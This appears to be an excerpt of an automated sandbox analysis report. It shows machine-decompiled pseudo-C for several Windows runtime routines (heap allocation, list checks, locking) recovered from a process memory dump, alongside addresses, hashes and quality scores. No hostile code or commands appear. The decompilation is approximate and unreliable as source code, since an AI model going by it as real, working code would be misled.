0x04a83e20
0x04a83e35
0x00000000
0x04a83de9
0x04a83de9
0x04a83de9
0x04a83dee
0x04a83dfd
0x04a83dff
0x04a83e02
0x04a83e05
0x04a83e05
0x00000000
0x04a83df0
0x04a83de7
0x04abe78f
0x04abe794
0x04a83d79
0x04a83d84
0x04a83d89
0x04a83d8e
0x00000000
0x04abe7a4
0x04a83d96
0x04a83d9a
0x00000000
0x04a83d9a
0x00000000
0x04abe794
0x04a83d6e
0x04a83d73
0x00000000
0x04abe7b5
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79c91d2b6eb9c6339a351174312ecd7bd23859b383ed9a10d906dc14ebb53eea
Instruction ID: 4fe54ec19d6095fd145d1881beaf2b08a13b4345cf347d4a23517a0c35e978f8
Opcode Fuzzy Hash: 79c91d2b6eb9c6339a351174312ecd7bd23859b383ed9a10d906dc14ebb53eea
Instruction Fuzzy Hash: E331AD71B01614DBCB24AF29D841AABBBF5EF55B00B05846EEC46CB350E631E880D790

Uniqueness

Uniqueness Score: -1.00%

Function 04A7A61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04A7A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x4b20220);
				E04A9D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x4b37b9c; // 0x0
				_t55 = L04A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E04A9D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x4b37b10 =  *0x4b37b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x4b3536c; // 0xdcbaa8
					if( *_t51 != 0x4b35368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x4b35368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x4b3536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E04A7A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x04a7a61c
0x04a7a61e
0x04a7a623
0x04a7a628
0x04a7a62b
0x04a7a62d
0x04a7a648
0x04a7a64a
0x04a7a64f
0x04ab9b44
0x04a7a6ec
0x04a7a6f1
0x04a7a6f1
0x04a7a655
0x04a7a657
0x04a7a65a
0x04a7a65d
0x04a7a662
0x04a7a663
0x04a7a667
0x04a7a668
0x04a7a66d
0x04a7a706
0x04a7a706
0x04ab9bda
0x04ab9be6
0x04ab9beb
0x00000000
0x04ab9beb
0x04a7a679
0x04ab9b7a
0x00000000
0x04ab9b7a
0x04a7a683
0x04a7a6f4
0x04a7a6f7
0x04a7a6f9
0x04a7a6fd
0x04a7a6a0
0x04a7a6a0
0x04a7a6ad
0x04a7a6af
0x04a7a6b4
0x04ab9ba7
0x04ab9bac
0x00000000
0x00000000
0x04ab9bc6
0x04ab9bce
0x04ab9bd1
0x04ab9bd3
0x04ab9bd3
0x00000000
0x04ab9bd1
0x04a7a6bd
0x04a7a6c3
0x04a7a6c6
0x04a7a6d2
0x04a7a701
0x04a7a704
0x00000000
0x04a7a704
0x04a7a6d4
0x04a7a6d6
0x04a7a6d9
0x04a7a6db
0x04a7a6e1
0x04a7a6e6
0x04a7a6e8
0x04a7a6e8
0x04a7a6ea
0x00000000
0x04a7a6ea
0x04a7a688
0x04a7a692
0x04a7a694
0x04a7a699
0x00000000
0x00000000
0x04a7a69d
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3a2adfdb6ff41a89eb5173a5528df3c65c1aa466a698cf3e6cbf78958d820d6
Instruction ID: 21ef736598b4cf10057bf2ae3f6897dc296c13e94db031b5b1a62e484ec4eb5f
Opcode Fuzzy Hash: e3a2adfdb6ff41a89eb5173a5528df3c65c1aa466a698cf3e6cbf78958d820d6
Instruction Fuzzy Hash: B74167B5A00205EFDB24CF59C990B9EBBF5FB49304F1580AAE909AB341D778BD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04AC7016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04AC7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x4b3d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04AC6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04AC6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04A67D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04A89AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E04A8B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04A64620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x04ac7016
0x04ac701e
0x04ac702b
0x04ac7033
0x04ac7037
0x04ac703c
0x04ac703e
0x04ac7041
0x04ac7045
0x04ac704a
0x04ac7050
0x04ac7055
0x04ac705a
0x04ac7062
0x04ac7062
0x04ac705a
0x04ac7064
0x04ac7064
0x04ac7067
0x04ac7071
0x04ac7096
0x04ac709b
0x04ac70a2
0x04ac70a6
0x04ac70a7
0x04ac70ad
0x04ac70b3
0x04ac70b6
0x04ac70bb
0x04ac70c3
0x04ac70c3
0x04ac70c6
0x04ac70cd
0x04ac70dd
0x04ac70e0
0x04ac70e2
0x04ac70e2
0x04ac70ee
0x04ac7101
0x04ac70f0
0x04ac70f9
0x04ac70f9
0x04ac710a
0x04ac710e
0x04ac7112
0x04ac7117
0x04ac7118
0x04ac7118
0x04ac70bb
0x04ac711d
0x04ac7123
0x04ac7131
0x04ac7131
0x04ac7136
0x04ac713d
0x04ac713e
0x04ac713f
0x04ac714a
0x04ac714a
0x04ac7084
0x04ac7088
0x00000000
0x04ac708e
0x04ac708e
0x04ac7092
0x00000000
0x04ac7092

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6e0fbaddba6ee6ae99c614e971f7e83ff444cc57890141ef337e9ae54d78c45
Instruction ID: b9f42c363e1faa2eca1d641892cb85e2c0dcdfafc2b2dd55ec10eb707c6f4967
Opcode Fuzzy Hash: e6e0fbaddba6ee6ae99c614e971f7e83ff444cc57890141ef337e9ae54d78c45
Instruction Fuzzy Hash: 8A31A2766057529BD320DF68C941A6BB7E9FF88700F044A2DF89587690E730F904CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04A6C182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E04A6C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04A67D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E04B18D34(_v8, _t80);
					}
					E04A62280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E04A5FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E04B18833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E04A5FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E04A8B180();
						if(_a4 != 0) {
							E04A62280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E04A6BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E04A6BB2D(_t16, _t15);
						E04A6B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E04A5FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E04A5FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E04A5FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x04a6c18d
0x04a6c18f
0x04a6c191
0x04a6c19b
0x04a6c1a0
0x04a6c1d4
0x04a6c1de
0x04ab2d6e
0x04a6c1e4
0x04a6c1e4
0x04a6c1e4
0x04a6c1ec
0x04ab2d7d
0x04ab2d7d
0x04a6c1f3
0x04a6c1ff
0x04ab2d88
0x04ab2d8d
0x04ab2d94
0x04ab2d94
0x04ab2d9f
0x04ab2da4
0x04ab2dab
0x04ab2db0
0x04ab2db2
0x04ab2db3
0x04ab2db4
0x04ab2dbc
0x04ab2dc3
0x04ab2dc3
0x04a6c205
0x04a6c205
0x04a6c208
0x04a6c20e
0x04a6c211
0x04a6c216
0x04a6c219
0x04a6c21f
0x04a6c222
0x04a6c22c
0x04a6c234
0x04a6c23a
0x04a6c23f
0x04a6c245
0x04a6c24b
0x04a6c251
0x04a6c25a
0x04a6c276
0x04a6c27d
0x04a6c27d
0x04a6c25c
0x04a6c25c
0x00000000
0x04a6c25e
0x04a6c1a4
0x04a6c1aa
0x04a6c1b3
0x04a6c265
0x04a6c26c
0x04a6c26c
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 0c208aac602d4fdf80fe37189bfced6556b67e3b892455a6ef6372c699ba3ce6
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: A6314872701546BEE705FBB4C580BE9F768BF42218F04419AD95D8B241DB387A49DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 04A86DE6, Relevance: .1, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E04A86DE6(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t39;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t59;
				signed int _t63;
				intOrPtr _t64;
				intOrPtr* _t66;
				void* _t68;
				intOrPtr _t69;
				signed int _t73;
				signed int _t75;
				intOrPtr _t77;
				signed int _t80;
				intOrPtr _t82;

				_t68 = __edx;
				_push(__ecx);
				_t80 = __ecx;
				_t75 = _a4;
				if(__edx >  *((intOrPtr*)(__ecx + 0x90))) {
					L23:
					asm("lock inc dword [esi+0x110]");
					if(( *(_t80 + 0xd4) & 0x00010000) != 0) {
						asm("lock inc dword [ecx+eax+0x4]");
					}
					_t39 = 0;
					L13:
					return _t39;
				}
				_t63 =  *(__ecx + 0x88);
				_t4 = _t68 + 7; // 0xa
				_t69 =  *((intOrPtr*)(__ecx + 0x8c));
				_t59 = _t4 & 0xfffffff8;
				_v8 = _t69;
				if(_t75 >= _t63) {
					_t75 = _t75 % _t63;
					L15:
					_t69 = _v8;
				}
				_t64 =  *((intOrPtr*)(_t80 + 0x17c + _t75 * 4));
				if(_t64 == 0) {
					L14:
					if(E04A86EBE(_t80, _t64, _t75) != 1) {
						goto L23;
					}
					goto L15;
				}
				asm("lock inc dword [ecx+0xc]");
				if( *((intOrPtr*)(_t64 + 0x2c)) != 1 ||  *((intOrPtr*)(_t64 + 8)) > _t69) {
					goto L14;
				} else {
					_t73 = _t59;
					asm("lock xadd [eax], edx");
					if(_t73 + _t59 > _v8) {
						if(_t73 <= _v8) {
							 *(_t64 + 4) = _t73;
						}
						goto L14;
					}
					_t77 = _t73 + _t64;
					_v8 = _t77;
					 *_a12 = _t64;
					_t66 = _a8;
					if(_t66 == 0) {
						L12:
						_t39 = _t77;
						goto L13;
					}
					_t52 =  *((intOrPtr*)(_t80 + 0x10));
					if(_t52 != 0) {
						_t53 = _t52 - 1;
						if(_t53 == 0) {
							asm("rdtsc");
							 *_t66 = _t53;
							L11:
							 *(_t66 + 4) = _t73;
							goto L12;
						}
						E04A76A60(_t66);
						goto L12;
					}
					while(1) {
						_t73 =  *0x7ffe0018;
						_t82 =  *0x7FFE0014;
						if(_t73 ==  *0x7FFE001C) {
							break;
						}
						asm("pause");
					}
					_t66 = _a8;
					_t77 = _v8;
					 *_t66 = _t82;
					goto L11;
				}
			}

0x04a86de6
0x04a86dee
0x04a86df1
0x04a86df4
0x04a86dfd
0x04ac05d3
0x04ac05d3
0x04ac05e4
0x04ac05f9
0x04ac05f9
0x04ac05fe
0x04a86e96
0x04a86e9c
0x04a86e9c
0x04a86e03
0x04a86e09
0x04a86e0c
0x04a86e12
0x04a86e15
0x04a86e1b
0x04ac05a1
0x04a86eb1
0x04a86eb1
0x04a86eb1
0x04a86e21
0x04a86e2a
0x04a86e9f
0x04a86eab
0x00000000
0x00000000
0x00000000
0x04a86eab
0x04a86e2c
0x04a86e34
0x00000000
0x04a86e3d
0x04a86e3d
0x04a86e42
0x04a86e4d
0x04ac05ac
0x04ac05b2
0x04ac05b2
0x00000000
0x04ac05ac
0x04a86e56
0x04a86e59
0x04a86e5d
0x04a86e5f
0x04a86e64
0x04a86e94
0x04a86e94
0x00000000
0x04a86e94
0x04a86e6a
0x04a86e6d
0x04ac05ba
0x04ac05bd
0x04ac05ca
0x04ac05cc
0x04a86e91
0x04a86e91
0x00000000
0x04a86e91
0x04ac05c0
0x00000000
0x04ac05c0
0x04a86e7e
0x04a86e7e
0x04a86e80
0x04a86e86
0x00000000
0x00000000
0x04a86eba
0x04a86eba
0x04a86e88
0x04a86e8b
0x04a86e8f
0x00000000
0x04a86e8f

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
Instruction ID: 8d6d90c9c8d62364146ee4ff5ba0da9fb1cc8edb0c6f021afa297129d332d95f
Opcode Fuzzy Hash: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
Instruction Fuzzy Hash: F031AF31308605DFD728DF29C580AAAB7B6FFC9324B14C95EE45A8B251DB31F802CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04AF3D40, Relevance: .1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E04AF3D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x4b3d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E04A62280(_t34, 0x4b38a6c);
				_t64 =  *0x4b35768; // 0x771c5768
				if(_t64 != 0x4b35768) {
					while(1) {
						_t8 = _t64 + 8; // 0x771c5770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E04A5FFB0(_t53, _t64, 0x4b38a6c);
						 *0x4b3b1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E04A62280(_t45, 0x4b38a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x4b35768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E04A5FFB0(_t51, _t64, 0x4b38a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E04A8B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

0x04af3d40
0x04af3d48
0x04af3d52
0x04af3d59
0x04af3d5d
0x04af3d61
0x04af3d63
0x04af3d67
0x04af3d69
0x04af3d72
0x04af3d76
0x04af3d7a
0x04af3d7f
0x04af3d8b
0x04af3d91
0x04af3d91
0x04af3d91
0x04af3d94
0x04af3d96
0x04af3d9d
0x04af3da1
0x04af3db0
0x04af3dba
0x04af3dbc
0x04af3dbc
0x04af3dc6
0x04af3dcb
0x04af3dcf
0x04af3dd1
0x04af3dd4
0x00000000
0x00000000
0x04af3dd9
0x04af3e0c
0x04af3e0c
0x04af3e0f
0x04af3ddb
0x04af3ddb
0x04af3de0
0x00000000
0x04af3de2
0x04af3de2
0x04af3de4
0x04af3de8
0x04af3deb
0x04af3df1
0x00000000
0x04af3df3
0x04af3df3
0x04af3df5
0x04af3df8
0x04af3dfa
0x00000000
0x04af3dfa
0x04af3df1
0x04af3de0
0x04af3e11
0x04af3e11
0x00000000
0x04af3dfe
0x04af3e04
0x04af3e06
0x00000000
0x04af3e06
0x00000000
0x04af3e04
0x04af3d91
0x04af3e15
0x04af3e1a
0x04af3e1f
0x04af3e1f
0x04af3e23
0x04af3e29
0x00000000
0x00000000
0x04af3e2e
0x00000000
0x04af3e30
0x04af3e30
0x04af3e35
0x00000000
0x04af3e37
0x04af3e3e
0x04af3e42
0x04af3e48
0x04af3e4e
0x00000000
0x04af3e4e
0x04af3e35
0x00000000
0x04af3e2e
0x04af3e5b
0x04af3e5c
0x04af3e5d
0x04af3e68
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 115671770ee838e6cf0468c6fcf8303a8fb4e2a9f22996840d9e7c355f81f2e1
Instruction ID: 2e1e11d656ca0810bb7ca1339267b23e6c0e541fab4ced81f4f1dc5b191073f5
Opcode Fuzzy Hash: 115671770ee838e6cf0468c6fcf8303a8fb4e2a9f22996840d9e7c355f81f2e1
Instruction Fuzzy Hash: 833169B1609302DFCB10EF64C98055ABBE1FF85615F0449AEF9899B250D730FD05CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04A7A70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E04A7A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x4b37b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x4b37b10 = 8;
					 *0x4b37b14 = 0x4b37b0c;
					 *0x4b37b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E04A7A990(0x4b37b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L04A7A840(__edx, __ecx, __ecx, _t52, 0x4b37b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x4b37b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x4b37b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x4b37b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L04A64620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x4b37b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E04A8F3E0(_t50,  *0x4b37b14, _t8 >> 3);
						_t28 =  *0x4b37b14; // 0x771c7b0c
						__eflags = _t28 - 0x4b37b0c;
						if(_t28 != 0x4b37b0c) {
							L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x4b37b14 = _t50;
						_t48 = _v12;
						 *0x4b37b10 = _t9;
						goto L6;
					}
					 *0x4b37b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x04a7a713
0x04a7a714
0x04a7a717
0x04a7a71d
0x04a7a720
0x04a7a722
0x04a7a727
0x04a7a74a
0x04a7a754
0x04a7a75e
0x04a7a768
0x04a7a76a
0x04a7a773
0x04a7a78b
0x04a7a790
0x04a7a792
0x04a7a741
0x04a7a741
0x04a7a743
0x04a7a749
0x04a7a749
0x04a7a732
0x04a7a73a
0x04a7a797
0x04a7a79d
0x04a7a7a3
0x04a7a7a9
0x04a7a7b6
0x04a7a7bc
0x04a7a7ca
0x04a7a7e0
0x04a7a7e2
0x04a7a7e4
0x04ab9bf2
0x00000000
0x04ab9bf2
0x04a7a7ed
0x04a7a7f2
0x04a7a800
0x04a7a805
0x04a7a80d
0x04a7a812
0x04ab9c08
0x04ab9c08
0x04a7a818
0x04a7a81b
0x04a7a821
0x04a7a824
0x00000000
0x04a7a824
0x04a7a7ae
0x00000000
0x04a7a7ae
0x04a7a73c
0x04a7a73e
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

